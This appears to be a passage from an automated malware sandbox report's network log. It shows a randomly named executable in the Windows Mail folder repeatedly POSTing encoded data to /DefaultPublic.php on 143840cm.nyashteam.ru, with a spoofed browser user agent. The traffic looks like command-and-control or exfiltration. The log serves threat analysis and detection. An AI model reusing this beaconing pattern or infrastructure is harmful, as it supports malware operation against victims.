Nov 25, 2024 22:38:34.098864079 CET	1048	OUT	Data Raw: 5a 5e 5f 5e 58 5a 50 56 59 59 54 56 57 5e 55 5c 58 55 5b 5a 59 5c 56 44 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z^_^XZPVYYTVW^U\XU[ZY\VDZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#%#+:0$6#'5X!7/.(+R?$]+2*\-$_= (&\%#P-0
Nov 25, 2024 22:38:35.020371914 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:35.255645990 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49870	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:35.516689062 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:35.864422083 CET	1048	OUT	Data Raw: 5f 5e 5a 5f 5d 5e 55 54 59 59 54 56 57 5a 55 5b 58 59 5b 52 59 5a 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _^Z_]^UTYYTVWZU[XY[RYZVHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV Z03>_< 37%656'$,83V?<.:&,])0?.&\%#P-
Nov 25, 2024 22:38:36.851155043 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:37.093024969 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:35 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49872	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:37.529242992 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:37.880199909 CET	1048	OUT	Data Raw: 5a 54 5f 5f 58 5d 50 56 59 59 54 56 57 50 55 52 58 5d 5b 5c 59 5b 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZT__X]PVYYTVWPURX][\Y[VAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV ^3"?*$& %6";,7W+($+9:%??!(?>&\%#P-
Nov 25, 2024 22:38:38.846045017 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:39.093179941 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:37 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49878	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:39.342401981 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:39.692656994 CET	1048	OUT	Data Raw: 5a 5a 5f 5f 5d 5b 55 50 59 59 54 56 57 5e 55 53 58 5b 5b 5f 59 5f 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZZ__][UPYYTVW^USX[[_Y_VBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV $0:+98\''&6"B<W8+R?;(9.3?!$+>&\%#P-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49883	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:40.377465010 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1744 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:40.723898888 CET	1744	OUT	Data Raw: 5f 5d 5a 5f 58 5f 50 51 59 59 54 56 57 5e 55 53 58 58 5b 5a 59 5d 56 48 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _]Z_X_PQYYTVW^USXX[ZY]VHZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV ^$32[((3 [&C-[6' T83W?8?("[-5="7<&\%#P-0
Nov 25, 2024 22:38:41.741570950 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:41.994468927 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 26 00 23 3d 2c 08 27 3d 26 1e 2a 02 05 13 25 38 00 07 27 2e 20 40 21 1d 2a 03 30 3f 3f 51 37 2c 35 06 28 3e 2a 0b 30 00 22 1f 26 31 2e 51 01 13 22 5a 35 0a 29 53 2c 30 28 05 25 06 3c 0a 27 21 26 5b 3f 07 3b 14 36 0a 3d 58 3f 22 25 5d 2c 2f 23 00 29 3b 2f 1d 3b 33 2c 08 21 3f 2e 5f 08 13 20 0e 2a 11 09 1e 25 27 16 07 32 12 3b 52 36 2a 0f 0c 30 0d 03 51 22 3c 3f 58 28 2d 33 00 21 3d 29 0f 30 04 25 07 24 31 0e 09 24 39 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: &#=,'=&%8'. @!0??Q7,5(>0"&1.Q"Z5)S,0(%<'!&[?;6=X?"%],/#);/;3,!?._ %'2;R6*0Q"<?X(-3!=)0%$1$9"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49884	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:40.499844074 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:40.848948956 CET	1048	OUT	Data Raw: 5a 58 5a 5e 58 5d 50 51 59 59 54 56 57 5b 55 5f 58 5c 5b 5e 59 5a 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZXZ^X]PQYYTVW[U_X\[^YZV@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV ^03%?\('& Z&6.!,U;T(<+"9_=2 (&\%#P-$
Nov 25, 2024 22:38:41.816144943 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:42.061177015 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49886	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:42.318300962 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:42.680629015 CET	1048	OUT	Data Raw: 5a 59 5f 5c 5d 5c 50 52 59 59 54 56 57 5f 55 5a 58 54 5b 5b 59 58 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZY_\]\PRYYTVW_UZXT[[YXVBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#'#^??$'6-Z5''/4?8 X+95(])2_<&\%#P-
Nov 25, 2024 22:38:43.743849039 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:43.994277000 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:42 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49891	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:44.230937004 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:44.583214998 CET	1048	OUT	Data Raw: 5a 58 5f 59 5d 5c 50 56 59 59 54 56 57 5d 55 5a 58 55 5b 5f 59 5c 56 42 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZX_Y]\PVYYTVW]UZXU[_Y\VBZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV X$3(:$%?&%%!7// <;*2:%(^?14?&\%#P-<
Nov 25, 2024 22:38:45.550388098 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:45.793061018 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49895	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:46.036725044 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:46.395750046 CET	1048	OUT	Data Raw: 5a 55 5a 58 58 5f 55 50 59 59 54 56 57 5e 55 53 58 5c 5b 59 59 5b 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZUZXX_UPYYTVW^USX\[YY[VAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV _'U=<;3%%%%X!$8T?],X?..C$!$?>&\%#P-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49897	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:47.127258062 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:47.474391937 CET	1764	OUT	Data Raw: 5a 5d 5f 5e 58 5b 55 55 59 59 54 56 57 5d 55 5d 58 5b 5b 5e 59 5c 56 46 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z]_^X[UUYYTVW]U]X[[^Y\VFZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#%#>X+9$3_255]"087W(;<--;*"4+&\%#P-<
Nov 25, 2024 22:38:48.494791031 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:48.746434927 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 26 02 23 2e 2c 08 27 2d 00 54 3e 2f 34 03 26 06 2a 00 24 2e 34 06 23 27 25 5f 33 05 37 19 20 3f 36 5e 28 2d 3d 54 26 3e 2a 1f 24 1b 2e 51 01 13 21 01 22 30 36 0c 2c 0d 33 1a 25 2b 33 18 25 0f 26 15 2a 2e 0a 0e 35 1d 0b 5d 3f 0c 21 11 2d 2f 2c 5c 3d 3b 09 1d 3b 0e 37 53 35 15 2e 5f 08 13 23 1f 2a 2f 2f 1e 24 0e 3b 5f 31 05 37 1f 21 3a 39 0c 25 30 25 51 36 2c 38 01 2b 5b 24 10 35 58 29 0e 24 03 31 02 33 0f 30 0a 27 03 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: &#.,'-T>/4&$.4#'%_37 ?6^(-=T&>$.Q!"06,3%+3%&.5]?!-/,\=;;7S5._#//$;_17!:9%0%Q6,8+[$5X)$130'"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49899	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:47.361694098 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:47.708271027 CET	1048	OUT	Data Raw: 5f 59 5a 5f 58 5a 55 5b 59 59 54 56 57 5d 55 5a 58 5e 5b 5a 59 5c 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _YZ_XZU[YYTVW]UZX^[ZY\VIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV#0!(([0,Y'5!\5'#8^;S<8?<:C$>"(.&\%#P-<
Nov 25, 2024 22:38:48.724236965 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:48.978351116 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49903	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:49.218961954 CET	250	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue
Nov 25, 2024 22:38:49.567672968 CET	1048	OUT	Data Raw: 5f 5d 5f 58 58 5a 55 54 59 59 54 56 57 59 55 52 58 5b 5b 5a 59 50 56 49 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _]_XXZUTYYTVWYURX[[ZYPVIZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV 3&Z+9 Z$%72-]!48T,(()++*2&\.5#=;+>&\%#P-,
Nov 25, 2024 22:38:50.559544086 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:50.801122904 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:48 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49906	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:51.084918976 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:51.442698956 CET	1048	OUT	Data Raw: 5a 55 5a 5e 58 5f 55 54 59 59 54 56 57 51 55 52 58 58 5b 59 59 5d 56 40 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: ZUZ^X_UTYYTVWQURXX[YY]V@ZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV _$#>[+\(082%!Z67 ,(+]<Y?1:]-6,?2 <>&\%#P-
Nov 25, 2024 22:38:52.447654963 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:52.698419094 CET	158	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:50 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 3e 5d 5c 57 Data Ascii: >]\W

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49910	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:52.943392992 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1044 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:53.310233116 CET	1044	OUT	Data Raw: 5a 5c 5f 59 5d 5a 55 53 59 59 54 56 57 58 55 5d 58 59 5b 5a 59 5c 56 41 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: Z\_Y]ZUSYYTVWXU]XY[ZY\VAZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV ^$3_+:$6#1-[!B ;8)8 Z"X,5$["#\+&\%#P-0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49914	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:53.880311012 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1764 Expect: 100-continue Connection: Keep-Alive
Nov 25, 2024 22:38:54.239602089 CET	1764	OUT	Data Raw: 5f 5d 5f 5b 5d 5c 50 56 59 59 54 56 57 50 55 5c 58 59 5b 5d 59 5f 56 45 5a 41 43 5d 5f 59 55 56 5b 59 51 5f 50 5b 5b 50 5a 5f 51 5a 5a 57 54 5e 57 5f 58 5d 59 56 57 53 54 56 54 5c 5e 5d 5f 41 5e 54 58 59 56 5f 51 52 5f 52 5e 5b 44 57 5b 5e 51 5d Data Ascii: _]_[]\PVYYTVWPU\XY[]Y_VEZAC]_YUV[YQ_P[[PZ_QZZWT^W_X]YVWSTVT\^]_A^TXYV_QR_R^[DW[^Q]VYWZY_TUU[_UQX[Y\TT]]^YUA[XY]SZ\]WYP[]_\XYU^ZP_XTUZ^]XZPURYZ]^ZQUZXTSX\X\]YI[VY[_G\XQZUV[TZ\\XC[UW_UYV %#X(:$6(%%5Z#'38;W+2&\,%$*4?.&\%#P-
Nov 25, 2024 22:38:55.195949078 CET	25	IN	HTTP/1.1 100 Continue
Nov 25, 2024 22:38:55.437019110 CET	308	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 25 Nov 2024 21:38:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 0c 15 26 03 34 03 34 09 24 2d 22 1f 3d 5a 3c 00 31 3b 26 03 24 03 01 18 36 37 39 10 27 02 2b 52 37 02 00 13 29 2e 22 0e 24 3e 26 12 30 0b 2e 51 01 13 21 01 36 0a 2a 0d 38 0a 3b 5c 26 06 38 41 27 32 2e 5d 3f 07 30 0f 36 30 31 11 3c 0c 21 5b 38 3c 2b 03 2a 38 23 5f 2f 1e 30 0f 35 05 2e 5f 08 13 23 55 29 06 3b 57 25 27 1a 03 25 3c 28 0b 21 14 2e 18 25 20 3d 12 36 05 23 59 3f 3d 3f 02 22 00 0c 56 24 2d 22 16 30 1f 3f 52 33 39 22 5c 20 0c 29 50 0d 35 55 54 Data Ascii: &44$-"=Z<1;&$679'+R7)."$>&0.Q!68;\&8A'2.]?0601<![8<+8#_/05._#U);W%'%<(!.% =6#Y?=?"V$-"0?R39"\ )P5UT

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49916	37.44.238.250	80	344	C:\Program Files\Windows Mail\hxpWOXgnBGVLArPcwqxpuA.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 22:38:54.037837029 CET	274	OUT	POST /DefaultPublic.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 143840cm.nyashteam.ru Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
